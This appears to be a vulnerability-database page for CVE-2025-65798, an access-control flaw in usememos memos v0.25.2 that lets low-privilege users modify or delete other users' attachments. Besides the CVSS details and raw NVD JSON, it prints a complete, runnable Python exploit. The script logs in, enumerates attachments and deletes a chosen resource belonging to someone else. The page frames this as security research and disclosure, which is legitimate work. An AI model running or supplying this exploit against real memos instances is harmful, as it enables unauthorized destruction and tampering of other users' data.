Security Vulnerability Report
中文
CVE-2025-65798 CVSS 5.4 MEDIUM

CVE-2025-65798

Published: 2025-12-08 16:15:54
Last Modified: 2025-12-09 17:28:13
Source: [email protected]

Description

Incorrect access control in usememos memos v0.25.2 allows attackers with low-level privileges to arbitrarily modify or delete attachments made by other users.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:usememos:memos:0.25.2:*:*:*:*:*:*:* - VULNERABLE
usememos memos v0.25.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-65798 PoC - usememos memos v0.25.2 IDOR Vulnerability This PoC demonstrates the Insecure Direct Object Reference vulnerability in usememos memos that allows low-privilege users to delete/modify attachments belonging to other users. """ import requests import json import sys class MemosIDORExploit: def __init__(self, target_url, username, password): self.target_url = target_url.rstrip('/') self.username = username self.password = password self.session = requests.Session() self.token = None self.user_id = None def login(self): """Authenticate and obtain access token""" login_url = f"{self.target_url}/api/v1/auth/login" data = { "username": self.username, "password": self.password } try: response = self.session.post(login_url, json=data, timeout=10) if response.status_code == 200: result = response.json() self.token = result.get('accessToken') self.user_id = result.get('user', {}).get('id') print(f"[+] Login successful! User ID: {self.user_id}") return True else: print(f"[-] Login failed: {response.status_code}") return False except Exception as e: print(f"[-] Login error: {e}") return False def get_attachments(self): """Enumerate attachments (may include other users' attachments)""" headers = {"Authorization": f"Bearer {self.token}"} try: response = self.session.get( f"{self.target_url}/api/v1/resource", headers=headers, timeout=10 ) if response.status_code == 200: return response.json().get('data', []) except Exception as e: print(f"[-] Error fetching attachments: {e}") return [] def delete_attachment(self, resource_id): """Delete target attachment (IDOR vulnerability)""" headers = {"Authorization": f"Bearer {self.token}"} try: response = self.session.delete( f"{self.target_url}/api/v1/resource/{resource_id}", headers=headers, timeout=10 ) if response.status_code == 200: print(f"[+] Successfully deleted attachment: {resource_id}") return True else: print(f"[-] Delete failed: {response.status_code}") return False except Exception as e: print(f"[-] Delete error: {e}") return False def exploit(self, target_resource_id): """Execute the IDOR exploit""" print(f"[*] Target resource ID: {target_resource_id}") print("[*] Attempting IDOR attack to delete arbitrary attachment...") return self.delete_attachment(target_resource_id) def main(): if len(sys.argv) < 5: print("Usage: python3 cve-2025-65798_poc.py <target_url> <username> <password> <target_resource_id>") print("Example: python3 cve-2025-65798_poc.py http://localhost:5230 attacker password 123456") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] resource_id = sys.argv[4] exploit = MemosIDORExploit(target, user, pwd) if exploit.login(): print("[*] Enumerating attachments...") attachments = exploit.get_attachments() print(f"[*] Found {len(attachments)} attachment(s)") print("[*] Executing IDOR exploit...") exploit.exploit(resource_id) if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65798", "sourceIdentifier": "[email protected]", "published": "2025-12-08T16:15:53.737", "lastModified": "2025-12-09T17:28:13.270", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect access control in usememos memos v0.25.2 allows attackers with low-level privileges to arbitrarily modify or delete attachments made by other users."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:usememos:memos:0.25.2:*:*:*:*:*:*:*", "matchCriteriaId": "E673C3CA-3FAC-46BD-823A-BE91FCEAC154"}]}]}], "references": [{"url": "http://memos.com", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "http://usememos.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/usememos/memos/pull/5217", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://herolab.usd.de/security-advisories/usd-2025-0059/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.